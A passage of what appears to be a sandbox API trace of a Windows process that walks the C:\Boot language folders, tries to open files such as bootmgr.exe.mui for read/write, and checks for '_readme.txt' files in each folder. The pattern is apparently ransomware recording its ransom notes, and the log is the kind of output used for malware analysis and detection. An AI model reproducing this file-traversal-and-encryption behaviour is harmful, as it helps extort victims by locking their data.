ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa18f15c0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa18f15c0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0097.147] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0097.147] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.147] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe70 [0097.147] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.147] PathFindExtensionW (pszPath="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned=".mui" [0097.148] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0097.148] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe70 | out: hHeap=0x630000) returned 1 [0097.148] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa18f15c0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa18f15c0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa18f15c0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0097.148] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.148] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe70 [0097.148] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.148] PathFindExtensionW (pszPath="C:\\Boot\\hu-HU\\_readme.txt") returned=".txt" [0097.148] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe70 | out: hHeap=0x630000) returned 1 [0097.148] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa18f15c0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa18f15c0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa18f15c0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0097.148] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0097.148] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.148] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fde8 | out: hHeap=0x630000) returned 1 [0097.148] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 [0097.148] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fde8 [0097.148] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0097.148] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.148] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.148] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.148] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.148] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.149] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.149] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.149] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.149] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.149] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.149] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.149] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.149] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.149] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.149] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.149] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.164] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.164] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.164] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.164] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.164] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.164] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0097.164] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.164] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.164] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.164] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.164] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x9b91b28 [0097.164] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.164] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.164] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.164] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.164] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.164] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.164] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.164] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.164] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0097.164] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.165] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.165] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.165] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.165] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.165] PathFindFileNameW (pszPath="C:\\Boot\\it-IT\\") returned="it-IT\\" [0097.165] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.165] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0097.165] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0097.165] PathFindFileNameW (pszPath="") returned="" [0097.165] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.165] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0097.166] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0097.166] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x800) returned 0x32faf28 [0097.166] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x32faf28 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0097.166] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x9b78ec8 [0097.166] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.166] FreeLibrary (hLibModule=0x75670000) returned 1 [0097.167] PathAppendW (in: pszPath="C:\\Boot\\it-IT\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\it-IT\\_readme.txt") returned 1 [0097.167] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.167] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.167] PathFileExistsW (pszPath="C:\\Boot\\it-IT\\_readme.txt") returned 1 [0097.167] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.167] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.167] FindFirstFileW (in: lpFileName="C:\\Boot\\it-IT\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa1917720, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1917720, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0097.167] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.167] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa1917720, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1917720, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0097.167] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0097.167] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.167] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe28 [0097.167] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.167] PathFindExtensionW (pszPath="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned=".mui" [0097.168] CreateFileW (lpFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0097.168] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe28 | out: hHeap=0x630000) returned 1 [0097.168] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1917720, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa1917720, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1917720, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0097.168] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.168] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe28 [0097.168] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.168] PathFindExtensionW (pszPath="C:\\Boot\\it-IT\\_readme.txt") returned=".txt" [0097.168] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe28 | out: hHeap=0x630000) returned 1 [0097.168] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1917720, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa1917720, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1917720, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0097.168] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0097.168] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.168] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fde8 | out: hHeap=0x630000) returned 1 [0097.168] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 [0097.168] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fde8 [0097.168] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0097.168] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.168] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.168] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.169] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.169] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.169] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.169] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.169] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.169] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.169] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.169] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.169] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.169] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.169] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.169] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.169] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.169] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.169] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.169] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.169] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.169] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.169] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0097.169] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.169] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.169] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.169] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.169] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x9b91b28 [0097.169] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.169] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.170] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.170] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.170] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.170] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.170] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.170] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.170] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0097.170] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.170] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.170] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.170] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.170] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.170] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.170] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.170] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.170] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.170] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.170] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.170] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.170] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.170] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.170] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.170] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.170] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.170] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.170] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.171] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0097.171] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.171] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.171] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.171] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0097.171] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.171] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.171] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.171] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.171] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.171] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.171] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.171] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.171] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.171] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.171] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.171] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.171] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.171] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.171] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.171] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.171] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.171] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.171] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.172] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.172] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.172] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.172] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.172] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.172] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.172] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.172] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.172] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.172] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.172] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.172] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.172] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.172] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0097.172] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.172] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.172] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.172] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.172] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.172] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.172] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.172] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.172] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.172] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x9b91b28 [0097.172] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.173] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.173] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.173] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 